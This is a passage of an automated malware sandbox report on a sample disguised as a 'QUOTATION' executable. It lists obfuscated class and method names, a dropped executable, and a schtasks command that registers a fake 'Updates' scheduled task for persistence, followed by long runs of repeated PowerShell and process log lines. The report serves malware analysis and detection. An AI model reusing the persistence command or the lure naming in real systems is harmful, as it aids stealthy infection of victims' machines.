                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, ghmEPtcpbhLJkcjmN3.csHigh entropy of concatenated method names: 'qnI14Fu241', 'RWi1Hak6F9', 'oXB1cQg0gZ', 'YuZ1kiWlur', 'faC1EXSWsK', 'QlQ1hGZby0', 'Ujl1ynGnSO', 'eX61AHSmr1', 'OUv1sHprvF', 'BZW1LXgU3N'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, OTfiVjDeEJldbJSSNY.csHigh entropy of concatenated method names: 'dJxw1RiXJN', 'wSWwNRAa1S', 'sbswwR9Cqb', 'TWOw6xx5BF', 'jtgwevCssm', 'Rg9wOwCQny', 'Dispose', 'cIxSgvjVei', 'mTNSTHOb1H', 'x20SxM7sX9'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, mh461vLOdF6scj03DZ.csHigh entropy of concatenated method names: 'e9JfgwaYUB', 'ipLfxbI52F', 'SREfiy45XX', 'SdriPSWs56', 'uC5izpZHxu', 'qmwfRR9JOb', 'vZtfVPEgyt', 'e8wfBllJMg', 'Jq6f9KNp6Z', 'jg1fIbV4kh'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, Wm5PgCV987bktue2MfB.csHigh entropy of concatenated method names: 'w4h6PN0u3o', 'ypd6ztswx5', 'PvBoRJOncb', 'dkfM7OeVh2ZgaJdOuna', 'IgZ3mtez9K5wleJTUJx', 'D3JnZUr2pKOoHiSFKob', 'RCZFlZrXKCfNRqGT0Q4'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, rsXY0kVRfSEEHUpWfT9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DTQtZooA98', 'fA2tH68jNu', 'BJQtGFNMJ6', 'pgRtcBrDYc', 'FYAtk6E08w', 'RyjtUGjXgA', 'Wmgt0OZZ5Y'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, z8vZE1FasKrrsKiQKY.csHigh entropy of concatenated method names: 'ibbfY8woae', 'O9EfXhhuEX', 'YDPfQlBUXL', 'HZ7fqDCwqQ', 'Sj8fKXvpuw', 'ArRfMbUqrO', 'vlIfCMQArF', 'c07fJaFN7w', 'D8yfnqP2YW', 'LGKfWhvjPU'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, MQFq1od9SkL0Rg8bmt.csHigh entropy of concatenated method names: 'IXBivfydjx', 'oTtiTFwnqS', 'nMPi2jTo4T', 'd00ifaWCDq', 'QOSiaIu41w', 'pJH2mJXtJR', 'ISI25DbYGm', 'qWf2DDOUIM', 'teZ2r9XJke', 'WIB2pKtpO4'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, VuHDyTpdkPaJ9ZcnYd.csHigh entropy of concatenated method names: 'VWUwdLW5XR', 'jQ1wE1mCY1', 'AtlwhXucql', 'zH9wyNks5X', 'UJTwA9jjYZ', 'BJxwsVJINQ', 'oeOwLbSfTQ', 'JuSw3RDYyy', 'nUywFHZSqM', 'vudw48BF6h'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, S44ygxGGnT7s8bbPTh.csHigh entropy of concatenated method names: 'wlYuJ3LGdS', 'Qq5unFyMk0', 'HPkudN0GGk', 'hQjuEGxdvD', 'R9guya6h6P', 'aE0uAJW0RI', 'JscuLiNvyF', 'vR0u3HU0H6', 'RmEu403VBp', 'w9RuZ2JKDb'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, oQhHyS0DREPMY5rJOk.csHigh entropy of concatenated method names: 'VgaNjbvpsc', 'kUeN80DsEn', 'ToString', 'GCyNgIB3Ss', 'M9LNTw8eXA', 'iBSNxVQjfS', 'pW7N2o8NId', 'UB5NiXjUyy', 'UK4NftUvJS', 'hi9NaWFSqu'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, CsumnJTdv1phmYbgtw.csHigh entropy of concatenated method names: 'Dispose', 'DldVpbJSSN', 'TPVBEX8SSX', 'ia4kLgj5JJ', 'yM5VPnGTMb', 'SUHVzhbjk0', 'ProcessDialogKey', 'KZ5BRuHDyT', 'FkPBVaJ9Zc', 'EYdBBUOC9e'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, A4S2mBUCyWCekoIE8W.csHigh entropy of concatenated method names: 'ToString', 'FrW7ZsAZkk', 'Fd77Ed5qaB', 'ogj7h7MJQI', 'yHN7ycXWF1', 'Xdp7AqK2k8', 'r8O7sEmgs8', 'qvJ7LMf5lg', 'C5O73Uk4lW', 'eVQ7FRLlWj'
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeFile created: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
